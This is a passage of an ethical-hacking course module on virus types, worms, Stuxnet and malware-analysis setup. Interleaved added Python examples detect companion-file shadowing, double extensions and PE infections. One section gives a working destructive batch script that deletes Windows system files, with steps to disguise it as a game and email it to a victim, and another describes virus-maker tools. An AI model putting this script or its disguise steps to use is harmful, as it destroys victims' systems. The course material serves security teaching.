Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control over the computer. The mutation engine generates randomized decryption routines. This decryption routine varies every time a new program is infected by the virus. With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a program that is infected with a polymorphic virus is run by the user, the decryptor routine takes complete control over the system, after which it decrypts the virus code and the mutation engine. Next, the control of your system is transferred by the decryption routine to the virus, which locates a new program to infect. In RAM (Random Access Memory), the virus makes a replica of itself as well as the mutation engine. Then the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which has the capability of decrypting the virus. Here, this new copy of both the virus code and mutation engine is encrypted by the virus. Thus, this virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends this new decryption routine onto a new program, thereby continuing the process. Polymorphic viruses that are spread by the attacker in targeted systems are difficult to detect because here the virus body is encrypted and the decryption routine changes from infection to infection, so no two infections look the same; this makes it difficult for the virus scanner to identify this virus.


Metamorphic Viruses

- Metamorphic viruses rewrite themselves completely each time they are to infect a new executable
- Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again
- For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the metamorphic engine

Metamorphic Viruses

Some viruses rewrite themselves to infect newly executed files. Such viruses are complex and use metamorphic engines for execution. A code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex, extensive code. The commonly known metamorphic viruses are:

- Win32/Simile: This virus is written in assembly language and destined for Microsoft Windows. This process is complex, and nearly 90% of the virus code is generated by this process.
- Zmist: Zmist, also known as Zombie.Mistfall, is the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.

Module 07 Page 1051

Ethical Hacking and Countermeasures Copyright by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Viruses and Worms

Exam 312-50 Certified Ethical Hacker

FIGURE 7.12: Metamorphic Viruses Screenshot (a.) Variant A; b.) Variant B; c.) The "Unofficial" Variant C; d.) The .D variant (which was the "official" C of the original author)


File Overwriting or Cavity Viruses

A cavity virus overwrites a part of the host file with a constant (usually nulls), without increasing the length of the file and while preserving its functionality.

[Slide figure: an original file of size 45 KB and the infected file, also 45 KB, with a region of the file overwritten by Null bytes]

File Overwriting or Cavity Viruses

These are also known as space-fillers, since they maintain a constant file size while infecting by installing themselves into the target program. They append themselves to the end of files and also corrupt the start of files. This trigger event first activates and executes the virus code, and only later the original application program. Some program files have areas of empty space, and this empty space is the main target of these viruses. The cavity virus, also known as the space filler virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction of the original code; it installs itself inside the file it attempts to infect. This type of virus is rarely used because it is difficult to write. The Windows Portable Executable file format is designed for fast loading of programs. However, it leaves a certain gap in the file while it is being executed that can be used by the space filler virus to insert itself. The best-known virus of this type is CIH.

FIGURE 7.13: File Overwriting or Cavity Virus (Original File Size: 45 KB; Infected File Size: 45 KB)


Sparse Infector Viruses

Sparse Infector Virus: a sparse infector virus infects only occasionally (e.g., every tenth program executed), or only files whose lengths fall within a narrow range

Difficult to Detect: by infecting less often, such viruses try to minimize the probability of being discovered

Infection Process: wake up on the 15th of every month and execute code

Sparse Infector Viruses

Sparse infector viruses infect only occasionally (e.g., every tenth program executed, or on a particular day of the week) or only files whose lengths fall within a narrow range. By infecting less often, these viruses try to minimize the probability of being discovered.

FIGURE 7.14: Working of Sparse Infector Viruses (wake up on the 15th of every month and execute code)


Companion/Camouflage Viruses

A companion virus creates a companion file for each executable file the virus infects. Therefore, a companion virus may save itself as notepad.com, and every time a user executes notepad.exe (the good program), the computer will load notepad.com (the virus) and infect the system.

[Slide figure: the attacker's virus infects the system with a file notepad.com saved in the c:\winnt\system32 directory next to Notepad.exe]

Companion/Camouflage Viruses

Companion Viruses

The companion virus stores itself under the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified. Companion viruses exploit the DOS rule that runs COM files before EXE files: the virus installs an identically named COM file and thereby infects the EXE files.

Source: http://www.cknow.com/vtutor/CompanionViruses.html

Here is what happens: Suppose a companion virus is executing on your PC and decides it is time to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file called PGM.COM, containing the virus. The virus usually plants this file in the same directory as the .EXE file, but it could place it in any directory on your DOS path. If you type PGM and press Enter, DOS executes PGM.COM instead of PGM.EXE. (In order, DOS will execute COM, then EXE, and then BAT files of the same root name, if they are all in the same directory.) The virus executes, possibly infecting more files, and then loads and executes PGM.EXE. The user probably would fail to notice anything is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system.


FIGURE 7.15: Working of Companion/Camouflage Viruses (the virus infects the system with a file notepad.com saved in the c:\winnt\system32 directory alongside Notepad.exe)
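Because DOS resolves a bare command name by extension precedence (COM, then EXE, then BAT) and by directory order along the search path, a defender can re-run that resolution over the file system and flag every program that no longer resolves to the file the administrator expects. The Python below is an added example, not code from the EC-Council module or the cknow.com source; it emulates the resolution rule over a constructed directory tree (the names, directories and file contents are stand-ins) and reports the shadowed executables.

```python
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Order in which DOS tries extensions for a bare command name (COM, EXE, BAT).
EXT_ORDER = (".com", ".exe", ".bat")


def _listing(directory: Path) -> Dict[str, Path]:
    """Case-insensitive view of one directory, the way DOS sees file names."""
    return {p.name.lower(): p for p in directory.iterdir() if p.is_file()}


def resolve_command(name: str, search_path: List[Path]) -> Optional[Path]:
    """Emulate DOS command resolution: directories are tried in search order
    (current directory first, then PATH) and within each directory COM beats
    EXE, which beats BAT. Returns the file that would actually run."""
    name = name.lower()
    for directory in search_path:
        files = _listing(directory)
        for ext in EXT_ORDER:
            if name + ext in files:
                return files[name + ext]
    return None


def find_shadowed_programs(search_path: List[Path]) -> List[Tuple[Path, Path]]:
    """Return (expected, actually_run) pairs for every .exe/.bat that a bare
    command name no longer resolves to. A companion virus shows up as PGM.COM
    shadowing PGM.EXE; a .com dropped into an earlier search directory is
    caught the same way."""
    findings = []
    for directory in search_path:
        for fname, path in sorted(_listing(directory).items()):
            stem, ext = os.path.splitext(fname)
            if ext in (".exe", ".bat"):
                winner = resolve_command(stem, search_path)
                if winner is not None and winner != path:
                    findings.append((path, winner))
    return findings


def build_demo_tree(root: Path) -> List[Path]:
    """Constructed sample layout (not a real system) mirroring the module's
    notepad.com / notepad.exe case, plus a .com planted earlier on the path."""
    system32 = root / "winnt" / "system32"
    tools = root / "tools"
    system32.mkdir(parents=True)
    tools.mkdir()
    (system32 / "notepad.exe").write_bytes(b"MZ stand-in for the real notepad")
    (system32 / "notepad.com").write_bytes(b"stand-in for the companion file")
    (system32 / "calc.exe").write_bytes(b"MZ stand-in for the real calc")
    (tools / "backup.bat").write_bytes(b"@echo off\r\nrem constructed script\r\n")
    (tools / "calc.com").write_bytes(b"stand-in planted in an earlier PATH entry")
    return [tools, system32]          # search order: tools first, then system32


def demo() -> List[Tuple[str, str]]:
    """Run the check on the constructed tree; returns (expected, actually run) names."""
    with tempfile.TemporaryDirectory() as tmp:
        search_path = build_demo_tree(Path(tmp))
        return [(exp.name, run.name) for exp, run in find_shadowed_programs(search_path)]


if __name__ == "__main__":
    for expected, actual in demo():
        print(f"{expected} would be shadowed by {actual}")
```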


Shell Viruses

Virus code forms a shell around the target host program's code, making itself the original program and the host code its sub-routine

Almost all boot program viruses are shell viruses

[Slide figure: Before infection: Original Program. After infection: Virus Code wrapped around the Original Program]

Shell Viruses

A shell virus's code forms a layer around the target host program's code that can be compared to an "egg shell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code, and the virus assumes its identity.

FIGURE 7.16: Working of Shell Viruses (before infection: Original Program; after infection: Virus Code wrapped around the Original Program)


File Extension Viruses

File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file

With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think this is a text file and open it

This is an executable Visual Basic Script virus file and could do serious damage

Countermeasure is to turn off "Hide file extensions" in Windows

[Slide screenshot: Windows Folder Options dialog, View tab, Advanced settings for files and folders]

File Extension Viruses

Source: http://www.cknow.com/vtutor/FileExtensions.html

File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT. If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it.

This is an executable Visual Basic Script virus file that could do serious damage.

The countermeasure is to turn off "Hide file extensions" in Windows, as shown in the following screenshot:


FIGURE 7.17: Uncheck Hide File Extensions (Folder Options > View > Advanced settings: "Hide extensions for known file types")
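With "Hide extensions for known file types" enabled, Explorer strips only the last extension, so BAD.TXT.VBS is displayed as BAD.TXT. The Python check below is an added example, not part of the module or the cknow.com source: it reproduces that display rule for a constructed set of attachment names and flags the ones whose hidden final extension is executable while the visible name looks harmless. The extension sets are assumptions for the demo, not Windows' registry-driven list of known types.

```python
from typing import List, NamedTuple

# Extensions Windows executes directly on double-click (assumed subset for the demo).
EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "vbe",
                   "js", "jse", "wsf", "hta", "msi"}
# Extensions that open in a viewer and look harmless to a user (assumed subset).
BENIGN_EXTS = {"txt", "pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "gif"}
# Stand-in for the registry's "known file types" (assumed): Explorer hides only these.
KNOWN_EXTS = EXECUTABLE_EXTS | BENIGN_EXTS


class Verdict(NamedTuple):
    actual_name: str
    displayed_name: str
    real_ext: str
    deceptive: bool


def displayed_name(filename: str, hide_known: bool = True) -> str:
    """What Explorer shows: with hiding on, the LAST extension is removed if it
    is a known type; everything before it, including a second ".TXT", stays."""
    if not hide_known or "." not in filename:
        return filename
    stem, _, ext = filename.rpartition(".")
    return stem if stem and ext.lower() in KNOWN_EXTS else filename


def classify(filename: str) -> Verdict:
    """Flag a name whose real (last) extension is executable while the name the
    user sees ends in a benign-looking extension, e.g. BAD.TXT.VBS -> BAD.TXT.
    A plain setup.exe is NOT flagged: it displays as "setup" with no extension."""
    real_ext = filename.rpartition(".")[2].lower() if "." in filename else ""
    shown = displayed_name(filename)
    shown_ext = shown.rpartition(".")[2].lower() if "." in shown else ""
    deceptive = real_ext in EXECUTABLE_EXTS and shown_ext in BENIGN_EXTS
    return Verdict(filename, shown, real_ext, deceptive)


def triage(names: List[str]) -> List[str]:
    """Return the subset of attachment names a mail gateway should hold for review."""
    return [v.actual_name for v in (classify(n) for n in names) if v.deceptive]


# Constructed sample attachment names (not taken from any real mail log).
SAMPLE_ATTACHMENTS = ["BAD.TXT.VBS", "report.pdf.exe", "notes.txt", "photo.jpg",
                      "setup.exe", "invoice.PDF.scr", "archive.tar.gz", "README"]

if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        v = classify(name)
        print(f"{v.actual_name:18} shown as {v.displayed_name:15} "
              f"real type .{v.real_ext or '-':4} deceptive={v.deceptive}")
    print("hold for review:", triage(SAMPLE_ATTACHMENTS))
```

Switching the countermeasure on corresponds to `displayed_name(name, hide_known=False)`, which returns the full name unchanged.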


Add-on and Intrusive Viruses

Add-on Viruses

Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their own code at the beginning

[Slide figure: viral code and a JUMP placed around the Original Program]

Intrusive Viruses

[Slide figure: the Original Program partly overwritten by viral code]

Add-on and Intrusive Viruses

Add-on Viruses

Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus the virus replaces the startup information of the host code with its own, but it does not touch the host code itself; the virus code is simply executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.

FIGURE 7.18: Working of Add-on Viruses (Original Program with viral code and a JUMP inserted)
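The Windows PE format gives a defender two cheap structural checks for the infection shapes described in the cavity virus section and in this add-on/shell section: the alignment slack after a section's VirtualSize is normally zero-filled (a space-filler virus writes code into that gap), and the entry point of an unpacked binary normally lies in its first code section rather than in the last one (add-on and shell viruses append their code and redirect entry to it). The Python below is an added example, not code from the module or from any named virus family; it builds constructed minimal PE images in memory so it runs offline, and the "infected" shapes are synthetic stand-ins, not real samples.

```python
import struct
from typing import List, Optional, Tuple

FILE_ALIGN = 0x200     # FileAlignment: raw section data is padded up to this
SECT_ALIGN = 0x1000    # SectionAlignment: RVA spacing between sections
OPT_HDR_SIZE = 224     # size of a PE32 optional header


def _align(value: int, boundary: int) -> int:
    return -(-value // boundary) * boundary


def build_min_pe(sections: List[Tuple[str, bytes, bytes]], entry_rva: int) -> bytes:
    """Construct a minimal PE32 image for the demo (NOT real compiler output).
    Each section is (name, real_bytes, fill): real_bytes become VirtualSize and
    fill pads the raw data out to FILE_ALIGN. A linker leaves that slack zeroed;
    it is exactly the gap a space-filler virus writes its code into."""
    n = len(sections)
    hdr_end = _align(64 + 4 + 20 + OPT_HDR_SIZE + 40 * n, FILE_ALIGN)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew -> "PE\0\0"
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, OPT_HDR_SIZE, 0x0102)
    opt = bytearray(OPT_HDR_SIZE)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 32, SECT_ALIGN)
    struct.pack_into("<I", opt, 36, FILE_ALIGN)
    table, body = bytearray(), bytearray()
    raw_ptr, rva = hdr_end, SECT_ALIGN
    for name, data, fill in sections:
        raw_size = _align(len(data), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             rva, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)  # CODE|EXEC|READ
        body += data + fill * (raw_size - len(data))
        raw_ptr += raw_size
        rva += _align(raw_size, SECT_ALIGN)
    image = dos + b"PE\0\0" + coff + opt + table
    return bytes(image + b"\0" * (hdr_end - len(image)) + body)


def parse_sections(pe: bytes) -> List[dict]:
    """Read the COFF section table; raise on anything that is not a PE file."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n = struct.unpack_from("<H", pe, pe_off + 6)[0]           # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]   # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size
    out = []
    for i in range(n):
        name, vsize, rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                    "vsize": vsize, "rva": rva, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return out


def filled_caves(pe: bytes) -> List[dict]:
    """Sections whose file slack (VirtualSize .. SizeOfRawData) holds non-zero
    bytes. Toolchains zero-fill that slack, so data there is a triage signal for
    a cavity/space-filler infection; some packers use it too, so verify by hand."""
    hits = []
    for s in parse_sections(pe):
        if s["raw_size"] <= s["vsize"]:
            continue                             # e.g. .bss: nothing on disk to fill
        start, end = s["raw_ptr"] + s["vsize"], s["raw_ptr"] + s["raw_size"]
        nonzero = sum(1 for b in pe[start:end] if b)
        if nonzero:
            hits.append({"name": s["name"], "offset": start,
                         "slack": end - start, "nonzero": nonzero})
    return hits


def entry_in_last_section(pe: bytes) -> Optional[str]:
    """Name of the section owning AddressOfEntryPoint when that is the LAST of
    several sections, else None. Add-on and shell viruses append their code and
    point the entry there; packers do the same, so this is a hint, not proof."""
    secs = parse_sections(pe)
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    ep = struct.unpack_from("<I", pe, pe_off + 24 + 16)[0]    # optional header + 16
    for i, s in enumerate(secs):
        if s["rva"] <= ep < s["rva"] + max(s["vsize"], s["raw_size"]):
            return s["name"] if len(secs) > 1 and i == len(secs) - 1 else None
    return None


def demo() -> dict:
    """Constructed clean image versus two constructed infection shapes."""
    text, data = (".text", b"\x90" * 100, b"\0"), (".data", b"D" * 0x200, b"\0")
    clean = build_min_pe([text, data], entry_rva=0x1000)
    cavity = build_min_pe([(".text", b"\x90" * 100, b"\xCC"), data], entry_rva=0x1000)
    addon = build_min_pe([text, data, (".viral", b"\xE9" * 64, b"\0")], entry_rva=0x3000)
    return {"clean_caves": filled_caves(clean), "clean_entry": entry_in_last_section(clean),
            "cavity_caves": filled_caves(cavity), "addon_entry": entry_in_last_section(addon)}


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```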


Intrusive Viruses

Intrusive viruses overwrite the host code with their own, either by completely removing the target host's program code or sometimes by overwriting only part of it. Therefore, the original code is not executed properly.

FIGURE 7.19: Working of Intrusive Viruses


Transient and Terminate and Stay Resident Viruses

Basic Infection Techniques

Direct Action or Transient Virus: transfers all of the controls of the host code to where it resides; selects the target program to be modified and corrupts it

Terminate and Stay Resident Virus (TSR): remains permanently in the memory during the entire work session even after the target host's program is executed and terminated; can be removed only by rebooting the system

Transient and Terminate and Stay Resident Viruses

Transient Viruses

Transient viruses transfer all control to the host code where they reside, select the target program to be modified, and corrupt it.

Terminate and Stay Resident Virus (TSR)

TSR viruses remain permanently in memory during the entire work session, even after the target host program is executed and terminated. They can be removed only by rebooting the system.


Writing a Simple Virus Program

1. Create a batch file Game.bat with this text:
   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Send the Game.com file as an email attachment to a victim
4. When run, it deletes core files in the WINNT directory, making Windows unusable

Writing a Simple Virus Program

For demonstration purposes, a simple program that can be used to cause harm to a target system is shown here:

1. Create a batch file Game.bat with the following text:
   @echo off
   del c:\winnt\system32\*.*
   del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using the bat2com utility
3. Assign an icon to Game.com using the Windows file properties screen
4. Send the Game.com file as an email attachment to a victim
5. When the victim runs this program, it deletes core files in the \WINNT directory, making Windows unusable

The victim would have to reinstall Windows, causing problems for already saved files.


TeraBIT Virus Maker

[Slide screenshot: TeraBIT Virus Maker option checklist (e.g., Avoid Opening Notepad, Disable Task Manager, Disable Regedit, Disable Windows Firewall, Format All Hard Drives)]

TeraBIT Virus Maker

TeraBIT Virus Maker produces a virus that is detected by almost all antivirus software when scanned. This virus mostly doesn't harm the PC, but it can disable the antivirus installed on the system for a short time.


FIGURE 7.20: TeraBIT Virus Maker (screenshot of the option checklist, with "File Name", "File Name After Install", "Run Virus with Windows" and a "Create Virus" button)


JPS Virus Maker and DELmE's Batch Virus Maker

[Slide screenshots: JPS Virus Maker 3.0 and DELmE's Batch Virus Maker]

JPS Virus Maker and DELmE's Batch Virus Maker

JPS Virus Maker

JPS Virus Maker is a tool to create viruses. It also has a feature to convert a virus into a worm, and it can be used to disable the normal hardware of the system.


FIGURE 7.21: JPS Virus Maker Screenshot (JPS Virus Maker 3.0 option checklist, with "Name After Install" and "Server Name: Sender.exe" fields)

DELmE's Batch Virus Maker

DELmE's Batch Virus Maker is a simple tool that allows you to create your own choice of bat file viruses to suit your tasks.

FIGURE 7.22: DELmE's Batch Virus Maker Screenshot


Module Flow

Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

Module Flow

Prior to this, we discussed various types of viruses. Now we will discuss computer worms and how they are different from viruses.

Virus and Worms Concepts
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm Maker Thing).


Computer Worms

Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction

Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system

Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates a botnet; these botnets can be used to carry out further cyber attacks

Computer Worms

Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system. A worm does not require a host to replicate, although in some cases one may argue that a worm's host is the machine it has infected. Worms are a subtype of viruses. Worms were considered mainly a mainframe problem, but after most of the world's systems were interconnected, worms were targeted against the Windows operating system and were sent through email, IRC, and other network functions. Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates a botnet; these botnets can be used to carry out further cyber-attacks.


How Is a Worm Different from a Virus?

Replicates on its own: a worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs

Spreads through the infected network: a worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically, but a virus does not

How Is a Worm Different from a Virus?

TABLE 7.1: Difference between Virus and Worms

Virus: A virus is a file that cannot be spread to other computers unless an infected file is replicated and actually sent to the other computer, whereas a worm does just the opposite. Files such as .com, .exe, or .sys, or a combination of them, are corrupted once the virus runs on the system. Viruses are a lot harder to get off an infected machine. Their spreading options are far fewer than those of a worm, because viruses only infect files on the machine.

Worm: A worm, after being installed on a system, can replicate itself and spread by using IRC, Outlook, or other applicable mailing programs. A worm typically does not modify any stored programs. As compared to a virus, a worm can be easily removed from the system. Worms have more spreading options than a virus.


Worm Analysis: Stuxnet

Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power plant. The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries.

Stuxnet contains many features such as:

1. Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
2. Updates itself through a peer-to-peer mechanism within a LAN
3. Spreads in a LAN through a vulnerability in the Windows Print Spooler
4. Exploits a total of four unpatched Microsoft vulnerabilities
5. Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
6. Copies and executes itself on remote computers through network shares running a WinCC database server
7. Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
8. Contacts a command and control server that allows the hacker to download and execute code, including updated versions
9. Contains a Windows rootkit that hides its binaries and attempts to bypass security products
10. Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system

Source: http://www.symantec.com

Worm Analysis: Stuxnet

Source: http://www.symantec.com

Stuxnet is a complex threat and malware with diverse modules and functionalities. It is mostly used to seize control of and reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs), which gives the attacker a way into the complete system: by changing the code, the attacker takes unauthorized control of the systems without the knowledge of the operators. Stuxnet contains many features such as:

- Self-replicates through removable drives exploiting a vulnerability allowing auto-execution
- Spreads in a LAN through a vulnerability in the Windows Print Spooler
- Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability
- Copies and executes itself on remote computers through network shares running a WinCC database server


- Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
- Updates itself through a peer-to-peer mechanism within a LAN
- Exploits a total of four unpatched Microsoft vulnerabilities
- Contacts a command and control server that allows the hacker to download and execute code, including updated versions
- Contains a Windows rootkit that hides its binaries and attempts to bypass security products
- Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system


o r m

n a l y s i s :

S t u x n e t (C ontd)

C E H

When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export Stuxnet hook Ntdll.dll to monitor for d B *! requests to load specially crafted file < names; these specially crafted filenames are mapped to another location instead - a location specified by W32.Stuxnet

Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks The dropper component ofStuxnet is a wrapper program that contains all of the above components stored inside itself in a section name "stub" When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports

It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls

W lH k tiH W
h ttp ://w w w .s y m a n te c .c o m

Copyright by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited.

Worm Analysis: Stuxnet (Contd)
Source: http://www.symantec.com

Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks. It hooks Ntdll.dll to monitor for requests to load specially crafted filenames; these specially crafted filenames are mapped to another location instead, a location specified by W32.Stuxnet. The dropper component of Stuxnet is a wrapper program that contains all components stored inside itself in a section named "stub." When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports. Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls.


Worm Analysis: Stuxnet (Contd)
Source: http://www.symantec.com

Infection Routine Flow
Stuxnet checks if it has administrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take whatever actions it likes on the computer. If it does not have Administrator rights, it executes one of the two zero-day escalation of privilege attacks described in the following diagram. If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Technique section. When the process does not have administrator rights on the system, it tries to attain these privileges by using one of two zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the compromised computer. If the operating system is Windows Vista, Windows 7, or Windows Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is Windows XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.


If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with administrator rights in the case of the Task Scheduler vulnerability. The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the win32k.sys vulnerability and the Task Scheduler vulnerability are currently not released as patches are not yet available. After export 15 completes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version number of the compromised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect removable drives; injects itself into the Step 7 process to infect all Step 7 projects; sets up the global mutexes that are used to communicate between different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid; after that it checks the value "NTVDM TRACE" in the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation

FIGURE 7.23: Infection Routine Flow (flowchart: Check CFG → registry key NTVDM Trace = 19790529 → Date < 06/24/2012 (past deadline: Exit; date OK: continue) → Check OS (XP or less: Set SACL; Vista or higher: Set DACL) → Create global mutex → Create .pnf & .cfg files (Oem7a.pnf; file OK) → Decrypt resources 201 & 242 and write rootkit files to disk → Decrypt & load self from disk, call export 6 (get version) → Compare running version number and version on disk (branches Equal and Error) → Set file times → Create rootkit service reg keys (hides malicious files) → Inject in service, call export 32 (infects removable drives) → Inject in Step 7 & call export 32 (infects Step 7 projects) → Create global mutexes → Exit)



Worm Maker: Internet Worm Maker Thing

Internet Worm Maker Thing is a tool specifically designed for generating a worm. The generated Internet worms try to spread over networks; they are essentially preset attacks that target a host, compromise it, and use it as a base from which to plan and launch attacks in the future. The worms work independently. An Internet worm sends copies of itself via vulnerable computers on the Internet.

FIGURE 7.24: Internet Worm Maker Thing (screenshot of the Internet Worm Maker Thing Version 4.00: Public Edition window, showing its payload, infection, startup and output path options)


Module Flow

Malware analysis is defined as the process of taking malware apart to study it. It is usually performed for various reasons, such as finding the vulnerabilities that are exploited to spread the malware, the information that was stolen, and the prevention techniques to be taken to stop it from entering the system or network in the future.

Module flow: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing.

Detailed information about the malware analysis procedure is explained in the next few slides.



What Is a Sheep Dip Computer?
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware. This "sheep dipped" computer is isolated from other computers on the network to block any viruses from entering the system. Before this procedure is carried out, any downloaded programs are saved on external media such as CD-ROMs or floppy diskettes. A sheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions. A sheep dip computer:

- Runs port and network monitors
- Runs user, group permission, and process monitors
- Runs device driver and file monitors
- Runs registry and kernel monitors



Antivirus Sensor Systems
An antivirus system is a collection of computer software that detects and analyzes various malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.

FIGURE 7.25: Working of Antivirus Sensor Systems (diagram: System 1, System 2 and System 3 on the internal network; a Network Anti-Virus System made up of Anti-Virus, Anti-Spyware, Anti-Trojan, Anti-Spamware, Anti-Phishing and Email-Scanner components sits between the network and the Internet, passing allowed traffic and reflecting the rest)


An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-phishing, an email scanner, and so on. Usually, it is placed between the network and the Internet. It allows only genuine traffic to flow through the network and blocks malicious traffic from entering. As a result, it ensures network security.


Malware Analysis Procedure: Preparing Testbed
Malware analysis provides an in-depth understanding of each individual sample and identifies emerging technical trends from large collections of malware samples. The samples of malware are mostly compatible with the Windows binary executable. Malware analysis is conducted with a variety of goals. The following is the procedure for preparing the malware analysis testbed:

- Install VMware or Virtual PC on the system
- Install the guest OS into the Virtual PC/VMware
- Isolate the system from the network by ensuring that the NIC card is in "host only" mode
- Disable the shared folders and the guest isolation
- Copy the malware over to the guest OS
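As an added example that is not part of the course material, the Python below audits a VMware Workstation .vmx file for the testbed settings in the list above (host-only NIC, no shared folders, host/guest copy, paste and drag-and-drop switched off) and rewrites the weak settings. The .vmx key names are the ones VMware uses as I know them, and the sample .vmx text is constructed, not taken from a real VM.

```python
import re

# VMware Workstation .vmx keys (VMware's key names as I know them) and the value
# each must hold for an isolated analysis guest.  "Guest isolation" in the
# Workstation UI is the copy/paste/drag-and-drop group below.
REQUIRED = {
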